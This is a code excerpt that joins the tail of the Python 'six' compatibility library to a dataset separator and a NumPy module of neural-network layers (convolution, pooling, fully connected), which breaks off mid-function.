    MovedModule("html_entities", "htmlentitydefs", "html.entities"),
    MovedModule("html_parser", "HTMLParser", "html.parser"),
    MovedModule("http_client", "httplib", "http.client"),
    MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
    MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
    MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
    MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
    MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
    MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
    MovedModule("cPickle", "cPickle", "pickle"),
    MovedModule("queue", "Queue"),
    MovedModule("reprlib", "repr"),
    MovedModule("socketserver", "SocketServer"),
    MovedModule("tkinter", "Tkinter"),
    MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
    MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
    MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
    MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
    MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
    MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
    MovedModule("tkinter_colorchooser", "tkColorChooser",
                "tkinter.colorchooser"),
    MovedModule("tkinter_commondialog", "tkCommonDialog",
                "tkinter.commondialog"),
    MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_font", "tkFont", "tkinter.font"),
    MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
    MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
                "tkinter.simpledialog"),
    MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
    MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
    MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
    MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
    MovedModule("winreg", "_winreg"),
]
# Attach each move as a class attribute (a lazy descriptor) on _MovedItems.
for attr in _moved_attributes:
    setattr(_MovedItems, attr.name, attr)
del attr
# Register the pseudo-module so `import six.moves` works.
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_parse"""
# Attribute moves for the urllib.parse namespace (py2: urlparse/urllib).
_urllib_parse_moved_attributes = [
    MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
    MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
    MovedAttribute("urljoin", "urlparse", "urllib.parse"),
    MovedAttribute("urlparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
    MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
    MovedAttribute("quote", "urllib", "urllib.parse"),
    MovedAttribute("quote_plus", "urllib", "urllib.parse"),
    MovedAttribute("unquote", "urllib", "urllib.parse"),
    MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
    MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
    setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
# Register under both the flat and the nested pseudo-module names.
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_error"""
# Attribute moves for the urllib.error namespace (py2: urllib/urllib2).
_urllib_error_moved_attributes = [
    MovedAttribute("URLError", "urllib2", "urllib.error"),
    MovedAttribute("HTTPError", "urllib2", "urllib.error"),
    MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
    setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_request"""
# Attribute moves for the urllib.request namespace (py2: urllib/urllib2).
_urllib_request_moved_attributes = [
    MovedAttribute("urlopen", "urllib2", "urllib.request"),
    MovedAttribute("install_opener", "urllib2", "urllib.request"),
    MovedAttribute("build_opener", "urllib2", "urllib.request"),
    MovedAttribute("pathname2url", "urllib", "urllib.request"),
    MovedAttribute("url2pathname", "urllib", "urllib.request"),
    MovedAttribute("getproxies", "urllib", "urllib.request"),
    MovedAttribute("Request", "urllib2", "urllib.request"),
    MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
    MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
    MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
    MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
    MovedAttribute("FileHandler", "urllib2", "urllib.request"),
    MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
    MovedAttribute("urlretrieve", "urllib", "urllib.request"),
    MovedAttribute("urlcleanup", "urllib", "urllib.request"),
    MovedAttribute("URLopener", "urllib", "urllib.request"),
    MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
    setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_response"""
# Attribute moves for the urllib.response namespace (py2: urllib).
_urllib_response_moved_attributes = [
    MovedAttribute("addbase", "urllib", "urllib.response"),
    MovedAttribute("addclosehook", "urllib", "urllib.response"),
    MovedAttribute("addinfo", "urllib", "urllib.response"),
    MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
    setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_robotparser"""
# Attribute moves for the urllib.robotparser namespace (py2: robotparser).
_urllib_robotparser_moved_attributes = [
    MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
    setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
    """Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
    # Submodules are the pseudo-modules registered above.
    parse = sys.modules[__name__ + ".moves.urllib_parse"]
    error = sys.modules[__name__ + ".moves.urllib_error"]
    request = sys.modules[__name__ + ".moves.urllib_request"]
    response = sys.modules[__name__ + ".moves.urllib_response"]
    robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]
sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
    """Register *move* so it becomes importable from ``six.moves``."""
    setattr(_MovedItems, move.name, move)
def remove_move(name):
    """Unregister a move previously added to ``six.moves``.

    Raises AttributeError when *name* is registered neither as a lazy
    descriptor on the moves class nor as a resolved module attribute.
    """
    try:
        delattr(_MovedItems, name)
    except AttributeError:
        # Already resolved moves live in the module's __dict__ instead.
        try:
            del moves.__dict__[name]
        except KeyError:
            raise AttributeError("no such move, %r" % (name,))
# Names of the version-specific attributes used by the accessor helpers below.
if PY3:
    _meth_func = "__func__"
    _meth_self = "__self__"
    _func_closure = "__closure__"
    _func_code = "__code__"
    _func_defaults = "__defaults__"
    _func_globals = "__globals__"
    _iterkeys = "keys"
    _itervalues = "values"
    _iteritems = "items"
    _iterlists = "lists"
else:
    _meth_func = "im_func"
    _meth_self = "im_self"
    _func_closure = "func_closure"
    _func_code = "func_code"
    _func_defaults = "func_defaults"
    _func_globals = "func_globals"
    _iterkeys = "iterkeys"
    _itervalues = "itervalues"
    _iteritems = "iteritems"
    _iterlists = "iterlists"
# `next` is a builtin on py2.6+/py3; fall back to calling .next() otherwise.
try:
    advance_iterator = next
except NameError:
    def advance_iterator(it):
        return it.next()
next = advance_iterator
# `callable` was removed in py3.0-3.1; emulate it via the __call__ protocol.
try:
    callable = callable
except NameError:
    def callable(obj):
        return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
    def get_unbound_function(unbound):
        return unbound
    create_bound_method = types.MethodType
    Iterator = object
else:
    def get_unbound_function(unbound):
        return unbound.im_func
    def create_bound_method(func, obj):
        return types.MethodType(func, obj, obj.__class__)
    # Base class giving py2 classes a py3-style __next__-driven `next`.
    class Iterator(object):
        def next(self):
            return type(self).__next__(self)
    callable = callable
_add_doc(get_unbound_function,
         """Get the function out of a possibly unbound function""")
# Portable accessors for method/function internals, built on the
# version-specific attribute names chosen above.
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
    """Return an iterator over the keys of a dictionary."""
    return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
    """Return an iterator over the values of a dictionary."""
    return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
    """Return an iterator over the (key, value) pairs of a dictionary."""
    return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
    """Return an iterator over the (key, [values]) pairs of a dictionary."""
    return iter(getattr(d, _iterlists)(**kw))
# Byte/text literal helpers and byte-sequence accessors for each major version.
if PY3:
    def b(s):
        return s.encode("latin-1")
    def u(s):
        return s
    unichr = chr
    if sys.version_info[1] <= 1:
        def int2byte(i):
            return bytes((i,))
    else:
        # This is about 2x faster than the implementation above on 3.2+
        int2byte = operator.methodcaller("to_bytes", 1, "big")
    byte2int = operator.itemgetter(0)
    indexbytes = operator.getitem
    iterbytes = iter
    import io
    StringIO = io.StringIO
    BytesIO = io.BytesIO
else:
    def b(s):
        return s
    def u(s):
        return unicode(s, "unicode_escape")
    unichr = unichr
    int2byte = chr
    def byte2int(bs):
        return ord(bs[0])
    def indexbytes(buf, i):
        return ord(buf[i])
    def iterbytes(buf):
        return (ord(byte) for byte in buf)
    import StringIO
    StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
# exec_, print_ and reraise cannot share one spelling across versions because
# py2's `exec`/`print` statements and 3-argument `raise` are syntax errors on
# py3, so the py2 variants are defined (or run) inside strings.
if PY3:
    import builtins
    exec_ = getattr(builtins, "exec")
    def reraise(tp, value, tb=None):
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value
    print_ = getattr(builtins, "print")
    del builtins
else:
    def exec_(_code_, _globs_=None, _locs_=None):
        """Execute code in a namespace."""
        if _globs_ is None:
            # Default to the caller's globals/locals.
            frame = sys._getframe(1)
            _globs_ = frame.f_globals
            if _locs_ is None:
                _locs_ = frame.f_locals
            del frame
        elif _locs_ is None:
            _locs_ = _globs_
        exec("""exec _code_ in _globs_, _locs_""")
    exec_("""def reraise(tp, value, tb=None):
    raise tp, value, tb
""")
    def print_(*args, **kwargs):
        """The new-style print function."""
        fp = kwargs.pop("file", sys.stdout)
        if fp is None:
            return
        def write(data):
            if not isinstance(data, basestring):
                data = str(data)
            fp.write(data)
        # If any argument or separator is unicode, write everything as
        # unicode to avoid implicit-coercion UnicodeErrors.
        want_unicode = False
        sep = kwargs.pop("sep", None)
        if sep is not None:
            if isinstance(sep, unicode):
                want_unicode = True
            elif not isinstance(sep, str):
                raise TypeError("sep must be None or a string")
        end = kwargs.pop("end", None)
        if end is not None:
            if isinstance(end, unicode):
                want_unicode = True
            elif not isinstance(end, str):
                raise TypeError("end must be None or a string")
        if kwargs:
            raise TypeError("invalid keyword arguments to print()")
        if not want_unicode:
            for arg in args:
                if isinstance(arg, unicode):
                    want_unicode = True
                    break
        if want_unicode:
            newline = unicode("\n")
            space = unicode(" ")
        else:
            newline = "\n"
            space = " "
        if sep is None:
            sep = space
        if end is None:
            end = newline
        for i, arg in enumerate(args):
            if i:
                write(sep)
            write(arg)
        write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
    """Return a throwaway base class built by *meta*; deriving from it gives
    the subclass *meta* as its metaclass on both py2 and py3."""
    temp_base = meta("NewBase", bases, {})
    return temp_base
def add_metaclass(metaclass):
    """Class decorator that rebuilds the decorated class with *metaclass*."""
    def wrapper(cls):
        # Recreate the class from its own namespace, dropping the entries
        # the type machinery regenerates automatically.
        body = cls.__dict__.copy()
        body.pop('__dict__', None)
        body.pop('__weakref__', None)
        for slot_name in body.get('__slots__', ()):
            body.pop(slot_name)
        return metaclass(cls.__name__, cls.__bases__, body)
    return wrapper
| bsd-3-clause |
yzldw333/Neural-Network | NeuralNetwork/Layers/core.py | 1 | 18474 | import abc
import numpy as np
import random
CONV_TYPE = 0
FC_TYPE = 1
ACTIVATE_TYPE = 2
class BaseLayer(metaclass = abc.ABCMeta):
    """Abstract base for all layers in the doubly-linked forward/backward chain."""
    last_layer = None
    next_layer = None
    value = None #n*m array for forward computation
    num = 0 #num of elements in column not num of samples in row
    delta = None #n*m array for backward computation
    name = None
    type = None # layer type: CONV_TYPE, FC_TYPE, ACTIVATE_TYPE
    images = None
    width = None
    height = None
    channel = None
    def forward_compute(self):
        # Hook: subclasses compute self.value from the previous layer.
        pass
    def backward_compute(self):
        # Hook: subclasses compute self.delta / gradients from the next layer.
        pass
    def SetLast(self,lastLayer):
        self.last_layer = lastLayer
    def SetNext(self,nextLayer):
        self.next_layer = nextLayer
    def storeParameters(self): # hook: subclasses with learnable parameters override this
        pass
class ActivateLayer(BaseLayer):
    """Activation layer: mirrors the output geometry of the previous layer."""
    type = ACTIVATE_TYPE

    def SetLast(self, lastLayer):
        """Attach to `lastLayer` and copy its element count and geometry."""
        self.last_layer = lastLayer
        for attr_name in ('num', 'channel', 'width', 'height'):
            setattr(self, attr_name, getattr(lastLayer, attr_name))
class InputLayer(BaseLayer):
    """Input layer holding the raw images fed into a convolutional network."""
    # for convolution NN
    images = None
    channel = None
    width = None
    height = None
    type = None

    def __init__(self, channel, height=1, width=1):
        self.channel = channel
        self.height = height
        self.width = width
        self.num = channel * height * width

    def setValue(self, value):
        """Store `value` as (m, channel, height, width) images and expose a
        flattened (m, channel*height*width) view in self.value."""
        self.images = value
        sample_count = np.size(self.images, 0)
        flat_length = self.channel * self.height * self.width
        self.value = self.images.reshape(sample_count, flat_length)
        self.num = flat_length
class BaseConvolutionLayer(BaseLayer):
    """Shared plumbing for window-sliding layers (convolution / pooling).

    Derives the output spatial size from the previous layer and provides
    helpers that unroll the previous layer's images into 2-D matrices so the
    window operation becomes a plain matrix product.
    """
    type = CONV_TYPE
    channel = None
    squareSize = None  # side length of the sliding square window
    width = None       # output width after sweeping the window
    height = None      # output height after sweeping the window
    stride = None

    def __init__(self, squareSize, stride):
        self.squareSize = squareSize
        self.stride = stride

    def SetLast(self, lastLayer):
        """Attach to `lastLayer` and compute this layer's output geometry."""
        super().SetLast(lastLayer)
        self.width = int((lastLayer.width - self.squareSize) / self.stride + 1)
        self.height = int((lastLayer.height - self.squareSize) / self.stride + 1)

    def unRollImages(self, index):
        """Unroll image `index` of the previous layer channel by channel.

        Returns an array of shape (old_channel, squareSize**2, width*height):
        one unrolled window per output pixel, one column per pixel.
        """
        i = index
        old_images = self.last_layer.images
        # Images are laid out as (m, channel, height, width) -- the same
        # array is sliced that way in unRollImagesForConv.  The original
        # code unpacked width and height swapped here, which silently broke
        # non-square inputs; unpack in the true axis order instead.
        m, old_channel, old_height, old_width = old_images.shape
        newData = []
        for c in range(old_channel):
            tmp = []
            for h in range(0, old_height - self.squareSize + 1, self.stride):
                for w in range(0, old_width - self.squareSize + 1, self.stride):
                    tmp.append(old_images[i, c, h:h + self.squareSize,
                                          w:w + self.squareSize].reshape(1, self.squareSize ** 2))
            newData.append(tmp)
        newData = np.array(newData).reshape(old_channel, self.width * self.height,
                                            self.squareSize ** 2)
        newData = newData.transpose(0, 2, 1)
        return newData

    def unRollImagesForConv(self, index):
        """Unroll image `index` of the previous layer for convolution.

        Returns an array of shape (width*height, squareSize**2 * old_channel):
        one row per output pixel, containing that pixel's receptive-field
        window from every input channel.
        """
        i = index
        old_images = self.last_layer.images
        m, old_channel, old_height, old_width = old_images.shape
        newData = []
        for h in range(0, old_height - self.squareSize + 1, self.stride):
            for w in range(0, old_width - self.squareSize + 1, self.stride):
                tmp = []
                for c in range(old_channel):
                    # Collect the (h, w) window of channel c as one flat row.
                    tmp.append(old_images[i, c, h:h + self.squareSize,
                                          w:w + self.squareSize].reshape(1, self.squareSize ** 2))
                # Concatenate all channels of this pixel into a single row.
                tmp = np.array(tmp).reshape(1, self.squareSize ** 2 * old_channel)
                newData.append(tmp)
        newData = np.array(newData).reshape(self.width * self.height,
                                            self.squareSize ** 2 * old_channel)
        return newData
class ConvolutionLayer(BaseConvolutionLayer):
    """Trainable convolution layer implemented via im2col-style unrolling."""
    filters = None # weights, shape (squareSize**2 * in_channels, out_channels)
    bias = None # shape (1, out_channels)
    epsilon = 0.1 # half-width of the random initialisation range
    grad_filters = None
    rate = 0.3 # learning rate, annealed each backward pass by rate_modify()
    grad_bias = None
    output_layer = None # cached pointer to the network's output layer
    old_unroll_images_list = None # unrolled inputs cached by forward for backward
    def __init__(self,channel,squareSize,stride=1):
        super().__init__(squareSize,stride)
        self.channel = channel
    def rate_modify(self):
        # Anneal the learning rate according to the current cost value.
        if self.output_layer == None:
            # Walk forward to find (and cache) the terminal output layer.
            p = self.next_layer
            while p.next_layer != None:
                p = p.next_layer
            self.output_layer = p
        costValue = self.output_layer.costValue
        if costValue >1:
            self.rate = 0.2
        elif costValue >0.5:
            self.rate = 0.1
        elif costValue >0.05:
            self.rate = 0.05
        elif costValue >0.02:
            self.rate = 0.03
        elif costValue >0.01:
            self.rate = 0.01
        elif costValue >0.005:
            self.rate = 0.004
    def initParameters(self):
        # Load persisted parameters if present, else random-init in
        # [-epsilon, epsilon).  NOTE(review): assumes self.name was assigned
        # externally before SetLast runs -- confirm with callers.
        try:
            parameterFile = np.load(self.name+'.npz')
            self.filters = parameterFile['arr_0']
            self.bias = parameterFile['arr_1']
        except FileNotFoundError as err:
            self.filters = np.random.rand(self.squareSize**2*self.last_layer.channel,self.channel)*self.epsilon*2-self.epsilon
            self.bias = np.random.rand(1,self.channel)*self.epsilon*2-self.epsilon
    def storeParameters(self):
        # Persist filters and bias under <name>.npz (arr_0 / arr_1).
        np.savez(self.name+'.npz',self.filters,self.bias)
    def SetLast(self,lastLayer):
        super().SetLast(lastLayer)
        self.initParameters()
        self.num = self.channel*self.height*self.width
        pass
    def forward_compute(self):
        old_images = self.last_layer.images
        # NOTE(review): only m is used below; the width/height unpack order is
        # swapped relative to the (m, channel, height, width) layout.
        m,old_channel,old_width,old_height = old_images.shape
        result = []
        self.old_unroll_images_list = []
        for i in range(m):
            #compute the data
            newData = self.unRollImagesForConv(i)
            self.old_unroll_images_list.append(newData)
            convImage = newData.dot(self.filters)
            convImage+=self.bias
            convImage = convImage.transpose()
            result.append(convImage)
        #reshape the data
        self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
        self.value = self.images.reshape(m,self.channel*self.height*self.width)
    def backward_compute(self):
        self.rate_modify()
        m = np.size(self.images,0)
        self.delta = self.delta.reshape(m,self.channel,self.height,self.width)
        filters_grad = np.zeros([self.squareSize**2*self.last_layer.channel,self.channel])
        bias_grad = np.zeros([1,self.channel])
        lastDelta = np.zeros([m,self.last_layer.channel,self.last_layer.height,self.last_layer.width])
        for i in range(m):
            oldImage = self.old_unroll_images_list[i]
            tmpDelta = self.delta[i,:,:,:].reshape(self.channel,self.height*self.width).transpose()
            newDelta = tmpDelta.dot(self.filters.transpose()) #format(width*height, squareSize**2 * oldchannel)
            # Scatter each output pixel's gradient back over its receptive field.
            for c in range(self.last_layer.channel):
                for h in range(self.height):
                    for w in range(self.width):
                        lastW = w*self.stride
                        lastH = h*self.stride
                        startSquare = self.squareSize**2*c
                        tmpValue = newDelta[h*self.width+w,startSquare:startSquare+self.squareSize**2].reshape(self.squareSize,self.squareSize)
                        lastDelta[i,c,lastH:lastH+self.squareSize,lastW:lastW+self.squareSize] += tmpValue
            new_grad = oldImage.transpose().dot(tmpDelta)
            bias_grad += np.sum(tmpDelta,0)
            filters_grad+=new_grad
        # Average gradients over the batch, then apply the SGD update.
        filters_grad/=(1.0*m)
        bias_grad/=(1.0*m)
        self.grad_bias = bias_grad #store in object
        self.bias-=bias_grad*self.rate
        self.grad_filters = filters_grad #store in object
        self.filters-=filters_grad*self.rate
        self.last_layer.delta = lastDelta
        pass
class PoolingLayer(BaseConvolutionLayer):
    """Common base for pooling layers.

    Pooling keeps the channel count of the previous layer; only the spatial
    size changes (computed by BaseConvolutionLayer.SetLast).
    """
    images = None
    channel = None
    squareSize = None
    stride = None
    width = None
    height = None
    def __init__(self,squareSize,stride):
        super().__init__(squareSize,stride)
    def SetLast(self,lastLayer):
        super().SetLast(lastLayer)
        # Channel count passes through a pooling layer unchanged.
        self.channel = lastLayer.channel
        self.num = self.channel * self.height * self.width
class MaxPoolingLayer(PoolingLayer):
    """Max pooling; remembers argmax positions to route gradients back."""
    maxIndex = None # per-sample argmax offset within each pooling window
    def __init__(self,squareSize,stride):
        super().__init__(squareSize,stride)
    def SetLast(self,lastLayer):
        super().SetLast(lastLayer)
    def forward_compute(self):
        old_images = self.last_layer.images
        # NOTE(review): only m is used below; the width/height unpack order is
        # swapped relative to the (m, channel, height, width) layout.
        m,old_channel,old_width,old_height = old_images.shape
        result = []
        self.maxIndex = []
        for i in range(m):
            newData = self.unRollImages(i)
            #compute the data
            self.maxIndex.append(list(np.argmax(newData,1)))
            result.append(list(np.max(newData,1)))
        self.maxIndex = np.array(self.maxIndex).reshape(m,self.channel,self.width*self.height)
        #reshape the data
        self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
        self.value = self.images.reshape(m,self.channel*self.height*self.width)
    def backward_compute(self):
        m = np.size(self.images,0)
        self.delta = self.delta.reshape(m,self.channel,self.height,self.width)
        newDelta = np.zeros([m,self.last_layer.channel,self.last_layer.height,self.last_layer.width])
        for i in range(m):
            for j in range(self.channel):
                for h in range(self.height):
                    for w in range(self.width):
                        # Route the gradient only to the input pixel that won
                        # the max; tmpLoc is the flat offset inside the window.
                        tmpLoc = self.maxIndex[i,j,h*self.width+w]
                        relativeH = tmpLoc//self.squareSize
                        relativeW = tmpLoc - relativeH * self.squareSize
                        lastW = w*self.stride+relativeW
                        lastH = h*self.stride+relativeH
                        newDelta[i,j,lastH,lastW] += self.delta[i,j,h,w]
        self.last_layer.delta = newDelta
        pass
class AvgPoolingLayer(PoolingLayer):
    """Average-style pooling with a trainable per-channel scale and bias.

    output[c, p] = w[c] * sum(window values) + bias[c]; ``w`` starts at
    1/squareSize**2, i.e. a plain average.
    """
    w = None
    bias = None
    # Was a class-level mutable list shared by every instance; use None and
    # build a fresh list per forward pass instead (matches ConvolutionLayer).
    old_unroll_images_list = None
    grad_w = None
    rate = 0.1 # learning rate for the w/bias updates
    def __init__(self,squareSize,stride):
        super().__init__(squareSize,stride)
    def SetLast(self,lastLayer):
        super().SetLast(lastLayer)
        self.w = np.ones([self.channel,1])*1.0/self.squareSize**2
        self.bias = np.random.rand(self.channel,1)
    def forward_compute(self):
        old_images = self.last_layer.images
        m = old_images.shape[0]
        result = []
        self.old_unroll_images_list = []
        for i in range(m):
            newData = self.unRollImages(i)
            self.old_unroll_images_list.append(newData)
            # Sum each window, then apply the learned scale and bias.
            computeSum = np.sum(newData,1).reshape(self.channel,self.height*self.width)
            result.append(list(computeSum*self.w+self.bias))
        #reshape the data
        self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
        self.value = self.images.reshape(m,self.channel*self.height*self.width)
    def backward_compute(self):
        # Images are (m, channel, height, width); unpack in that order.  (The
        # original swapped width/height and then built oldDelta with the
        # swapped names, which only worked for square feature maps.)
        m,old_channel,old_height,old_width = self.last_layer.images.shape
        oldDelta = np.zeros([m,old_channel,old_height,old_width])
        w_grad = np.zeros([self.channel,1])
        bias_grad = np.zeros([self.channel,1])
        for i in range(m):
            tmpDelta = self.delta[i,:].reshape(self.channel,self.height*self.width)
            old_unroll_image = self.old_unroll_images_list[i]
            computeSum = np.sum(old_unroll_image,1).reshape(self.channel,self.height*self.width)
            for c in range(self.channel):
                for h in range(self.height):
                    for w in range(self.width):
                        lastW = w*self.stride
                        lastH = h*self.stride
                        tmpValue = tmpDelta[c,h*self.width+w]
                        # Every input pixel of the window receives w[c]*delta.
                        oldDelta[i,c,lastH:lastH+self.squareSize,lastW:lastW+self.squareSize] += tmpValue*self.w[c,0]
                        w_grad[c,0]+=computeSum[c,h*self.width+w]*tmpValue
                        bias_grad[c,0]+=tmpValue
        # Average over the batch, then apply the SGD update.
        w_grad/=(1.0*m)
        bias_grad/=(1.0*m)
        self.grad_w = w_grad
        self.w -= self.grad_w*self.rate
        self.bias -= bias_grad*self.rate
        self.last_layer.delta = oldDelta
class FullCrossLayer(BaseLayer):
    """Fully-connected layer; theta's first row acts as the bias."""
    type = FC_TYPE
    theta = None # weights, shape (last_layer.num + 1, num); row 0 is the bias
    grad_theta = None
    epsilon = 0.1 # half-width of the random initialisation range
    rate = 0.3 # learning rate, annealed each backward pass by rate_modify()
    output_layer = None # cached pointer to the network's output layer
    def __init__(self,num):
        self.num = num
        pass
    def rate_modify(self):
        # Anneal the learning rate according to the current cost value.
        if self.output_layer == None:
            # Walk forward to find (and cache) the terminal output layer.
            p = self.next_layer
            while p.next_layer != None:
                p = p.next_layer
            self.output_layer = p
        costValue = self.output_layer.costValue
        if costValue >1:
            self.rate = 0.2
        elif costValue >0.5:
            self.rate = 0.1
        elif costValue >0.05:
            self.rate = 0.05
        elif costValue >0.02:
            self.rate = 0.03
        elif costValue >0.01:
            self.rate = 0.01
        elif costValue >0.005:
            self.rate = 0.004
    def initParameters(self):
        # Load persisted weights if present, else random-init in
        # [-epsilon, epsilon).  NOTE(review): assumes self.name was assigned
        # externally before SetLast runs -- confirm with callers.
        try:
            parameterFile = np.load(self.name+'.npz')
            self.theta = parameterFile['arr_0']
        except FileNotFoundError as err:
            self.theta = np.random.rand(self.last_layer.num+1,self.num)*2*self.epsilon-self.epsilon
    def storeParameters(self):
        np.savez(self.name+'.npz',self.theta)
    def SetLast(self,lastLayer):
        super().SetLast(lastLayer)
        self.initParameters()
        pass
    def forward_compute(self):
        # Prepend a column of ones so theta's first row acts as the bias.
        m = np.size(self.last_layer.value,0)
        tmp = np.hstack((np.ones([m,1]),self.last_layer.value))
        self.value = tmp.dot(self.theta)
    def backward_compute(self):
        self.rate_modify()
        m = np.size(self.last_layer.value,0)
        #self.delta = self.next_layer.theta.transpose().dot(self.next_layer.delta)
        tmp = np.hstack((np.ones([m,1]),self.last_layer.value))
        self.last_layer.delta = self.delta.dot(self.theta.transpose())
        # Drop the bias column's gradient before propagating further back.
        self.last_layer.delta = self.last_layer.delta[:,1:]
        self.grad_theta = tmp.transpose().dot(self.delta)/(1.0*m)
        self.theta -= self.grad_theta*self.rate
class SigmoidLayer(ActivateLayer):
    """Sigmoid activation: s(x) = 1 / (1 + e^-x)."""
    def __init__(self):
        pass
    def forward_compute(self):
        if self.last_layer.type == CONV_TYPE:
            m = np.size(self.last_layer.images,0)
            # Activate the 4-D tensor (m, channel, height, width) so that
